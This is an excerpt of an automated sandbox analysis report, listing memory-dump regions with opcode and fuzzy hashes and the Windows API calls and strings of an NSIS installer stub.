                                                                                • Instruction Fuzzy Hash: 3DB16EB07141018FDB199B2CCD58B39769AEF81705F29416AEA02CF3B1EF25CC62D742
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a8a764920d83a7303cb179811b2dcb9353791c4ede1dd3e3ad1017c4c42703a3
                                                                                • Instruction ID: 56c3c74d11aa8c28e3cfd0807d9bc03be43bb54b2286cffb2e2ba81781080d54
                                                                                • Opcode Fuzzy Hash: a8a764920d83a7303cb179811b2dcb9353791c4ede1dd3e3ad1017c4c42703a3
                                                                                • Instruction Fuzzy Hash: 02B1D576A002148FCB04CFACD9849ADBBB6BF88315BAA8095E515AB361C735EC91CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cef3d8f648ca39e3cdeb964487e1adcb699ccd666d10f3c8a7d47c92437e69ce
                                                                                • Instruction ID: e42152b566ac86cc29215b7b1c46dbac74f88c682386b5d49f3efcfc30e9f1c4
                                                                                • Opcode Fuzzy Hash: cef3d8f648ca39e3cdeb964487e1adcb699ccd666d10f3c8a7d47c92437e69ce
                                                                                • Instruction Fuzzy Hash: E981B134700215CFEB04DF78D844AAE77F6AF8A610B1141BAE415DB3A1EB31EC01CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e62980b65b58e320d857eed066a38563d68923d10ffd2642bbc69b27ff804219
                                                                                • Instruction ID: 660dee56cec508e63cee7f41959f3dcbad5ec7644580b76839bdb08257fc0fae
                                                                                • Opcode Fuzzy Hash: e62980b65b58e320d857eed066a38563d68923d10ffd2642bbc69b27ff804219
                                                                                • Instruction Fuzzy Hash: B3817035A00A05CFCB18CFA9CC88AA9B7B7BF89310F258169D405EB3A5D731ED51CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b8ecc1e923dba9b9ecb42b2d33999ac8ec5a88cb0fec8cbc0c2ac6e439de4d5
                                                                                • Instruction ID: d694232861dbe93e627aaa1faeb02cdbe9557205da9e7b5e212da581d6099bb5
                                                                                • Opcode Fuzzy Hash: 6b8ecc1e923dba9b9ecb42b2d33999ac8ec5a88cb0fec8cbc0c2ac6e439de4d5
                                                                                • Instruction Fuzzy Hash: 39711B34704605CFDB19DF28C898AAD7BE6AF49714F1500A9E806CB3B1DB75DC61CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c4a477f2678116e28a98ee7c9d3237b9040820e0a974fa4169409fa7f193c54b
                                                                                • Instruction ID: be3b813a32f87a7397f2b7718337a8c17cce95aaa5038a7091f89932f98ef14e
                                                                                • Opcode ID: 04be50bcf6e6ecb24ed3ac28e2da3330ab4da39b74e8db13af2e6a12cd26f668
                                                                                • Instruction ID: cb09b0f5bc876cda2e30e8c1e022667dd88339fa0afd8622ed0f7fdd2676de42
                                                                                • Opcode Fuzzy Hash: 04be50bcf6e6ecb24ed3ac28e2da3330ab4da39b74e8db13af2e6a12cd26f668
                                                                                • Instruction Fuzzy Hash: 68317879A00315CFEB19DF71C4646ADBBB2AF89361F148539D816EB340DF399802CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 784a6d3317072173a964545495f9480cf52ba95f2142ed6981a7e4fbed08b22f
                                                                                • Instruction ID: 08defe817b8c3088cbf6cf86744d918bc13b49a7db8edef9da091adcb1f560d1
                                                                                • Opcode Fuzzy Hash: 784a6d3317072173a964545495f9480cf52ba95f2142ed6981a7e4fbed08b22f
                                                                                • Instruction Fuzzy Hash: 15212770E006158FDB05CB68C8845AEBBB2FF85315B658149E551A73A2C7349D63CF91
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e7d58ffbc8ca08691208bb88840842ce8bd02a891c70e3ab47f381d6bf3bef1c
                                                                                • Instruction ID: 776a94de7de3e37f8a512df2847084768fafbe674b309e4073df064d7ea8b275
                                                                                • Opcode Fuzzy Hash: e7d58ffbc8ca08691208bb88840842ce8bd02a891c70e3ab47f381d6bf3bef1c
                                                                                • Instruction Fuzzy Hash: 2721A475A00615DFCF14EF64C8509AE77A9EB99350B21C519E809DB380DB36EE42CBD1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cc3a8573224d34d9f8822d639a5ce2f4926dddcceebd3626e3ba9b2d062146eb
                                                                                • Instruction ID: d31d82e1d94efd9db4c22e0b25559d548fa3c770c143a7ff2aea2a8daa86a799
                                                                                • Opcode Fuzzy Hash: cc3a8573224d34d9f8822d639a5ce2f4926dddcceebd3626e3ba9b2d062146eb
                                                                                • Instruction Fuzzy Hash: 1821C031301A118BD7199B69CC9492FB3A3AF88761B154279E806DB354CF30DC028BC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908449501.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f0af83760f8b18aeb773fd77bcea6cb90c73c45da2901df54e6f952e6cd8d010
                                                                                • Instruction ID: 9c080d750ac4d079e85e108cfdee7df2adc537c49b1ff5ee61dde944e1762bca
                                                                                • Opcode Fuzzy Hash: f0af83760f8b18aeb773fd77bcea6cb90c73c45da2901df54e6f952e6cd8d010
                                                                                • Instruction Fuzzy Hash: E8210771604304EFDB24CFA4D8C4F16BBA1FB85714F20C96EE94A4F642C776D846DA62
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d69f0ab0d4ff1ad91ad407e7ee66e9d52b9e02c9cf90653b7fd51d004108cde1
                                                                                • Instruction ID: 17f2722903a38deb06beed6ca2eac85d5c8be66c25e437712cf3165b76c069f0
                                                                                • Opcode Fuzzy Hash: d69f0ab0d4ff1ad91ad407e7ee66e9d52b9e02c9cf90653b7fd51d004108cde1
                                                                                • Instruction Fuzzy Hash: BC113372E043599FCB01DBF89C008EEBB70FF8A210B258397E526B7151EA312906C7A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c3526fc7e8cb6baac55d9527b0a4b5a3df3df05d8c9d558fa8c7cb3be69818db
                                                                                • Instruction ID: 0722ce6b8fdb0455b27da03d11a9790ae96dd677286d06e6d2fa236e0327cbe1
                                                                                • Opcode Fuzzy Hash: c3526fc7e8cb6baac55d9527b0a4b5a3df3df05d8c9d558fa8c7cb3be69818db
                                                                                • Instruction Fuzzy Hash: C6210671D002198BDB15CBA9E9406EEBBF2BF88700F16843DD402B7351DB726C568BD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 77c27f31bdfab2e1a78f1259caaecb36b4559da77aedd4827269c90360c99c50
                                                                                • Instruction ID: 3538b08da2adf06fbc3f7c211e4c998d2618966d0effc5d282091e236309c6b1
                                                                                • Opcode Fuzzy Hash: 77c27f31bdfab2e1a78f1259caaecb36b4559da77aedd4827269c90360c99c50
                                                                                • Instruction Fuzzy Hash: 2231B478E11209CFCB48DFE4E59489DBBB6FF49714B205569E819AB320DB31AD06DF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 33a6f1294c316c1ed8179baeb25c1e9a5d05963cedd9b7bad92821361f3bbf17
                                                                                • Instruction ID: 657176e5da35883b4ad7370e8856612f16bdcd66ef2757a85642980ee61650c7
                                                                                • Opcode Fuzzy Hash: 33a6f1294c316c1ed8179baeb25c1e9a5d05963cedd9b7bad92821361f3bbf17
                                                                                • Instruction Fuzzy Hash: 1A21D5316081459FDB05AFA4E85566B3BA2FF84314F104069F9058B791CB39CE66DBE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 663323fa4463f3bf530968b213648d676dc7f507ddb86b47bdff0e92375f7b40
                                                                                • Instruction ID: fc0894b94bf57bd04b9a1848aff56325951f662a96ec7c7028f42bae3761ba4a
                                                                                • Opcode Fuzzy Hash: 663323fa4463f3bf530968b213648d676dc7f507ddb86b47bdff0e92375f7b40
                                                                                • Instruction Fuzzy Hash: 39110C303053408FE7090B7A5C146BBBEBB9FC7220B45447BE545C7296CD288D0A8371
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908449501.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 400ab5ba67ea5fbaa9a1fef8e5586e0ec150e2d8e661167b00a0c786dbe51cf7
                                                                                • Instruction ID: 2ac1206c8a20f716de8d8a1f10d7cbbd0ec72cf0d858a2dba1de294606dd0a40
                                                                                • Opcode Fuzzy Hash: 400ab5ba67ea5fbaa9a1fef8e5586e0ec150e2d8e661167b00a0c786dbe51cf7
                                                                                • Instruction Fuzzy Hash: C611DD75504280DFCB11CF50C9C4B15BBA2FB89314F24CAAEE84A4B652C33AD84ACF62
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 43984aa8355851ca5fdbc95cd0527a15602025ad7ced954191b207720f6e9b02
                                                                                • Instruction ID: e70cdaba5b5629ba5becae2252b37665dd8055ed01ff4632a5c6b2323a6e825a
                                                                                • Opcode Fuzzy Hash: 43984aa8355851ca5fdbc95cd0527a15602025ad7ced954191b207720f6e9b02
                                                                                • Instruction Fuzzy Hash: C001F132A001146FDF019E689C20AEF3BE7DFC8340F58802AF905D3691DB318E12ABA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1774cba11314e32f3aef0adf16d27e91b73dc11d9e63fc58352ba2f1eb72c27e
                                                                                • Instruction ID: 6cb0c8bc2ea0cc98d1644215f910d8720a14906bf8ddf86dfcd33f1b9fe7a7a1
                                                                                • Opcode Fuzzy Hash: 1774cba11314e32f3aef0adf16d27e91b73dc11d9e63fc58352ba2f1eb72c27e
                                                                                • Instruction Fuzzy Hash: EC211474D046098FCB11EFA8D8445EEBFB0FF49304F1441AAD805B7264EB315A95CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c02c293f6fd436efeff61eec56566bd8e8551dd355d3091decb3a953046da78d
                                                                                • Instruction ID: 2a68f98d77969ac3beecf3a41ce526e5076c82e514c6cc2120afab9c736bd1a5
                                                                                • Opcode Fuzzy Hash: c02c293f6fd436efeff61eec56566bd8e8551dd355d3091decb3a953046da78d
                                                                                • Instruction Fuzzy Hash: 1401C075A013148FD741DF78E40869A7BF4EF4E65070501BAE815DB321EB35CD018BA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37509c9d08dd6cfe6f7ef82b24c2bd9bf647adc14cff59fe028828a67e2daae8
                                                                                • Instruction ID: 4cbebd6201602fca4e8895e6ff14b6d04f5b5ce628844f52e84af9588e1938cf
                                                                                • Opcode Fuzzy Hash: 37509c9d08dd6cfe6f7ef82b24c2bd9bf647adc14cff59fe028828a67e2daae8
                                                                                • Instruction Fuzzy Hash: 551104319042068FDF12DF64E9407ADBBF1BF84B00F16462AD402AB263DB32AC56CBD1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 26ad1aa84690d94cb7bf06ac193a718b1f30f4454344259970541f353de18a66
                                                                                • Instruction ID: 8e53d573e2497e0195ca75cad1b1edbdc77d698880427c0dbcfbb5c658a075ea
                                                                                • Opcode Fuzzy Hash: 26ad1aa84690d94cb7bf06ac193a718b1f30f4454344259970541f353de18a66
                                                                                • Instruction Fuzzy Hash: 07F0F97AB84618CBA701D768E4405D977B0EF8D672F040272E925FB791DB21DA1587D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6756359c7e299570dae3eea2859377cf5302e9b4207b8023ed5eb5ac22fe74e6
                                                                                • Instruction ID: 6610e8d6701d502cedab488c9c7eb1e9be3a696a78dd9491d88e054393bb5d13
                                                                                • Opcode Fuzzy Hash: 6756359c7e299570dae3eea2859377cf5302e9b4207b8023ed5eb5ac22fe74e6
                                                                                • Instruction Fuzzy Hash: CEF0E9363043049FE3049B2ED8549973BFAEF86658B5500B6F505CB372DA61DC05CBA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1b246089ffed25b05d8913388fcfbc0ebf247eb6e4830e71ecc7d75b70703905
                                                                                • Instruction ID: eba436ba3037cccb0dcaa760c50ad90df441ef108b10ef89d3e55b82ae250b88
                                                                                • Opcode Fuzzy Hash: 1b246089ffed25b05d8913388fcfbc0ebf247eb6e4830e71ecc7d75b70703905
                                                                                • Instruction Fuzzy Hash: DB01A471E40329DFDB44EFB9D8006EEBBF5AF49210F50857AD429E7290EB3599018B90
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d370484c217d45e93543b3c1ce34f3fc4d9c5e43aa7d375e12004f41de80d0a4
                                                                                • Instruction ID: d65cb018a01444d2958016f7618ad21bf40f4c923d21668bbe15ced0344db017
                                                                                • Opcode Fuzzy Hash: d370484c217d45e93543b3c1ce34f3fc4d9c5e43aa7d375e12004f41de80d0a4
                                                                                • Instruction Fuzzy Hash: 37F012353002148FE7089B2AE85896A77BAEFC5765B158079F505CB361DE71DC01CBA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d470fed6a6086ec98b2a39eee5b6132c4921f9e1710f78132bf7ddb36a1d56d3
                                                                                • Instruction ID: da499e8809853881026c731940572ab7644271eb79df3e176099867e6a619570
                                                                                • Opcode Fuzzy Hash: d470fed6a6086ec98b2a39eee5b6132c4921f9e1710f78132bf7ddb36a1d56d3
                                                                                • Instruction Fuzzy Hash: BBE02630D04208ABEF049BA5FC083FAB7B4ABCB301F406436D104B3150CFB46925CAA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41e7791a4a19c9c403342aa635172917a588a5792d14830c283c9f6e59823aae
                                                                                • Instruction ID: 45daf4494ba6e99d9877352f6a890086839a6f1c2ba7b639796dbca7b87f31e7
                                                                                • Opcode Fuzzy Hash: 41e7791a4a19c9c403342aa635172917a588a5792d14830c283c9f6e59823aae
                                                                                • Instruction Fuzzy Hash: 01E02034D04204AFDF049BA5FC153FAB7B4A7CB301F406461D104B3191CBB4052A8695
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bb6ba974fabdb3244b88a8e56602866b95fca87fa5e1bc336d4af9fbd5491f3f
                                                                                • Instruction ID: e3da0be674589eae1f4d84d30a115f644094c927dc9b48613ffb5eb2b13bcd45
                                                                                • Opcode Fuzzy Hash: bb6ba974fabdb3244b88a8e56602866b95fca87fa5e1bc336d4af9fbd5491f3f
                                                                                • Instruction Fuzzy Hash: C2E02236C1036A8FCB0297B0DC004DEBB74EEC3620B0201A7C020AB012E7712A0EC7B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c04716c9e10e3ee9caf6f601e434b4299b8783d5ab997a31f4dae2b463c744f0
                                                                                • Instruction ID: 3eef78f0af7778a0031327155c98bc0b7a0cbdc095cec8d4db5f75273768acd6
                                                                                • Opcode Fuzzy Hash: c04716c9e10e3ee9caf6f601e434b4299b8783d5ab997a31f4dae2b463c744f0
                                                                                • Instruction Fuzzy Hash: 8EE02692E0C1408BD7148BF57C121B9BF30EED734270654C7C049EB9A5DB28EA26DB12
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46230c6576f09c6666d827a54c174dfa702f85fec6c5f6af570d8f38acefd34b
                                                                                • Instruction ID: d11da9fb24fcdfb0a84ed2d52bf0daba4ff4710a819ec5e558ec3020c0de8a8d
                                                                                • Opcode Fuzzy Hash: 46230c6576f09c6666d827a54c174dfa702f85fec6c5f6af570d8f38acefd34b
                                                                                • Instruction Fuzzy Hash: B4E0C2300243889FDF4293B9B8640C23BE97AC3304B425062A8408A623AE20194FA792
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a4c99ad3649600f9b5dcf4a8105e653c47af06e54099cd9b66a32d89472294df
                                                                                • Instruction ID: cadcff72579d7f552519d570ba00b008b5b76ef7f05123bd900fe4f392f2191d
                                                                                • Opcode Fuzzy Hash: a4c99ad3649600f9b5dcf4a8105e653c47af06e54099cd9b66a32d89472294df
                                                                                • Instruction Fuzzy Hash: CED05E32E2022B97CB00EBA5EC048EFF738EED6661B908626D52537140FB713659C7E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fba56a466bd5a15a1fedf65a1ba51a013d20f430b371c1242ffa57bb0aeff7c1
                                                                                • Instruction ID: 15746f94ec8a9702e9266ac7bfb89937060fdbafae86b01726beacb09c630669
                                                                                • Opcode Fuzzy Hash: fba56a466bd5a15a1fedf65a1ba51a013d20f430b371c1242ffa57bb0aeff7c1
                                                                                • Instruction Fuzzy Hash: DEC0123754D0246EA625108E3C909F6578CD3D53B5A250277F91CE7350A9028C9153B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b4747c4867f2bb71e145a04dcb6a883ea89bcecd6199d5859db0e74f74aef0a
                                                                                • Instruction ID: 5fbba934a152f7f72bc6cf9883794e6cda08feb0f76b3d6bb0f05a2a7aba3fd7
                                                                                • Opcode Fuzzy Hash: 9b4747c4867f2bb71e145a04dcb6a883ea89bcecd6199d5859db0e74f74aef0a
                                                                                • Instruction Fuzzy Hash: 88D0677AB000089BDB049F98EC409DDF776FB98221B448126EA15A3260C7319966DB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9c1f7aeed0dae39400052379090b116168eb7d50bcbecd906b3032decfad9aba
                                                                                • Instruction ID: 5c44104f76df901f9e3f245ff51db05b19f341b3709cc4a4f0da23c3a228d056
                                                                                • Opcode Fuzzy Hash: 9c1f7aeed0dae39400052379090b116168eb7d50bcbecd906b3032decfad9aba
                                                                                • Instruction Fuzzy Hash: F2D06C78E041188BCB20EFE4EA456ECB7B0AB99311F0114E69809B2610DB306AA48F12
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 22b6124fdbeb7ea513c5cc4b2d98a48a5fa9b74587ff1dd84997b20dc7e60660
                                                                                • Instruction ID: 7a2aeeccd8cfeb8f9dd0ad9cfb77d1f7f46bd2a3887c1e5c02112ec5b46a61d2
                                                                                • Opcode Fuzzy Hash: 22b6124fdbeb7ea513c5cc4b2d98a48a5fa9b74587ff1dd84997b20dc7e60660
                                                                                • Instruction Fuzzy Hash: 36C0123012435D87DD45E7F9F95559573AA7BC0604F808410B90519725DF7025868BD7
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32 ref: 00403250
                                                                                • GetVersion.KERNEL32 ref: 00403256
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
                                                                                • #17.COMCTL32(00000007,00000009), ref: 004032A1
                                                                                • OleInitialize.OLE32(00000000), ref: 004032A8
                                                                                • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
                                                                                • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
                                                                                • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 004032EC
                                                                                • CharNextA.USER32(00000000,00429000,00000020), ref: 00403317
                                                                                • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 00403414
                                                                                • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 00403425
                                                                                • lstrcatA.KERNEL32(0042A400,\Temp), ref: 00403431
                                                                                • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 00403445
                                                                                • lstrcatA.KERNEL32(0042A400,Low), ref: 0040344D
                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 0040345E
                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403466
                                                                                • DeleteFileA.KERNEL32(0042A000), ref: 0040347A
                                                                                  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                • OleUninitialize.OLE32(?), ref: 00403528
                                                                                • ExitProcess.KERNEL32 ref: 00403549
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
                                                                                • ExitProcess.KERNEL32 ref: 004036EB
                                                                                  • Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 3329125770-3941163293
                                                                                • Opcode ID: 5cb2cc3bf3739c0bfc0faa22fbc89fc69d5f2e95d9de7fdc040616a0820f4b48
                                                                                • Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
                                                                                • Opcode Fuzzy Hash: 5cb2cc3bf3739c0bfc0faa22fbc89fc69d5f2e95d9de7fdc040616a0820f4b48
                                                                                • Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404A11
                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404A1C
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A66
                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404A79
                                                                                • SetWindowLongA.USER32(?,000000FC,00404FF0), ref: 00404A92
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AA6
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AB8
                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 00404ACE
                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404ADA
                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AEC
                                                                                • DeleteObject.GDI32(00000000), ref: 00404AEF
                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B1A
                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B26
